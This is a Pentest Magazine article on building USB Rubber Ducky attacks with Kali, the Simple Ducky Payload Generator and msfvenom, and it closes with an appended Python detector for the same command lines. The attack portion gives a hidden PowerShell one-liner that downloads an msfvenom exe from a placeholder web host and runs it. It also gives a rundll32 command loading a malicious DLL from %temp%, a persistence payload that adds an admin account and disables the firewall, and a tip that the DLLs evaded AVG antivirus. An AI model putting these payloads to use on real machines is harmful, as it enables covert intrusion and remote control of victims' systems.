In this edition of Pentest Magazine I decided to write my article on Kali, the USB Rubber Ducky and the Simple Ducky Payload Generator. I will take it a step further by using msfvenom to create a custom exe that spawns a reverse shell, and a custom ducky script to deliver the payload. Why write an article on this topic? A few weeks back I was surfing Pluralsight and stumbled upon a video by Troy Hunt on the USB Rubber Ducky. He was discussing possible payloads that can be delivered through the evil HID. Of late I have been pondering ways to educate SMBs about the different techniques by which a simple payload can be executed to infiltrate their business undetected.
This article assumes that you are familiar with Kali Linux and its awesomeness. Now for the USB Rubber Ducky, if you're not familiar with it:
“The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found at usbrubberducky.com. Quack!”
README.txt, copied from https://github.com/hak5darren/USB-Rubber-Ducky
The USB Rubber Ducky is a commercial product. It's worth the cash and fun to play with!
We’ll continue on to the Simple Ducky Payload Generator created by skysploit.
The generator can be downloaded at https://code.google.com/archive/p/simple-ducky-payload-generator/downloads. The version as of this writing is installer_v1.1.1_debian.sh.
Once you have downloaded the file onto your Kali system, navigate to the Downloads folder to run it. You'll need to make the file executable before running it, see below. Instructions are also on the project's web page, including a YouTube video.
Below is a series of screenshots similar to what you should see during the installation process.
Now simply type simple-ducky to run the payload generator.
Now for this article I will stick to option #2 since typically our victims will be Windows users. For this demo I will use a Windows 7 “Persistence Reverse Shell” as the payload.
You need to specify if the machine has UAC enabled. In my case it does so I enter Y.
At the next screen there are more questions to answer: the username and password of the admin account to be created, the IP address the reverse shell should connect back to, whether UAC is enabled, and so on.
The success screen is as follows:
At this point you'll be asked whether you want to set up the ncat listener and whether you want to return to the main menu. I entered yes to both prompts. As you see below, a window opens with the created files, including the listener on whatever port you specified.
The next task is to copy the inject.bin file from /usr/share/simple-ducky to the microSD card, which is then inserted into the ducky. The ducky is then inserted into the victim machine.
What will this payload do exactly? It will create a persistent shell, create a local admin account, drop the firewall and enable Remote Desktop/Remote Desktop Assistance.
Now, this payload generator is a nifty tool, but what if you want to generate your own payloads for whatever reason? First you'll need the Duck Encoder, which can be downloaded from Hak5 Darren's GitHub page (URL near the top of the article).
So now I will generate my own payload using msfvenom and ducky script.
On my Kali machine I created a 32-bit binary to run on my Windows box using the following command:
Now to create the ducky payload (credit to Mubix for this one-liner):
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://www.yourwebsite.com/msfducky.old','%temp%\msfducky.exe'); Start-Process "%temp%\msfducky.exe"
Save it as payload.txt. Next, the inject.bin file needs to be created and saved to the root of the ducky's microSD card, the evil HID.
Usage (within the Duck Encoder directory): java -jar duckencoder.jar -i payload.txt -o /media/root/XXXX-XXXX/inject.bin
XXXX-XXXX = the volume label Kali assigns to your ducky's card when it mounts it.
With your ducky carrying the payload, all you need to do is insert it into the victim machine. Ducky will do the rest. :)
Now, how can we take this a step further? See below. On one of my machines running AVG, the antivirus picked up my malicious binaries but not my malicious DLLs.
So what next? Create a ducky script to execute the malicious DLLs. On a Windows box you would run the following command to load the DLL:
C:\Windows\System32\rundll32.exe %temp%\msfducky.dll,duck (or C:\Windows\SysWOW64\rundll32.exe %temp%\msfducky.dll,duck)
(duck is the exported function name rundll32 expects as its second argument. It does not have to exist in the DLL, but the argument is needed for the rundll32 command to run properly, so you can use anything here, such as aaaa.)
To create the DLL payload, use "-f dll" in msfvenom instead of "-f exe".
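As an added defender-side example (not part of the original article), here is a small Python scanner that flags process command lines matching the two payload patterns shown above: the hidden PowerShell download cradle that stages an exe in %temp%, and rundll32 loading a DLL out of %temp% with an arbitrary entry point. The rule names and the sample events are constructed for illustration; in practice the command lines would come from Sysmon Event ID 1 or Windows 4688 records.

```python
import re

# Indicators drawn from the two payload command lines shown in this article:
# a hidden PowerShell download cradle that stages an .exe in %temp% and starts
# it, and rundll32 loading a DLL out of %temp% with an arbitrary entry point.
# The rule names are our own; the %temp% alternative covers the expanded
# AppData\Local\Temp path that appears once the shell resolves the variable.
RULES = [
    ("powershell_hidden_download_cradle",
     re.compile(r"powershell.*-w(?:indowstyle)?\s+hidden.*DownloadFile", re.I)),
    ("temp_dropped_exe_started",
     re.compile(r"Start-Process\s+[\"']?(?:%temp%|\\AppData\\Local\\Temp)\\[^\"'\s]+\.exe", re.I)),
    ("rundll32_dll_from_temp",
     re.compile(r"rundll32(?:\.exe)?\s+(?:%temp%|[^\s,]*\\Temp)\\[^\s,]+\.dll,\S+", re.I)),
]


def scan_command_line(cmd):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_events(events):
    """events: dicts with 'host' and 'cmd' (e.g. Sysmon Event ID 1 CommandLine).
    Returns (host, [rule names]) for each event that trips at least one rule."""
    findings = []
    for ev in events:
        hits = scan_command_line(ev["cmd"])
        if hits:
            findings.append((ev["host"], hits))
    return findings


# Constructed sample telemetry, not real logs: two events reproduce the
# article's payloads, two are ordinary administrative activity.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmd": "powershell -windowstyle hidden (new-object System.Net.WebClient)"
                            ".DownloadFile('http://example.invalid/msfducky.old','%temp%\\msfducky.exe'); "
                            "Start-Process \"%temp%\\msfducky.exe\""},
    {"host": "WS01", "cmd": "C:\\Windows\\SysWOW64\\rundll32.exe %temp%\\msfducky.dll,duck"},
    {"host": "WS02", "cmd": "C:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "WS02", "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for host, hits in scan_events(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

Only the two WS01 events trip rules; the stock rundll32 control-panel call and the scripted backup on WS02 pass, which is the kind of discrimination a rule needs before it goes into an alerting pipeline.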
You might be asking, where is the ducky script? I’ll leave that to you .. :^P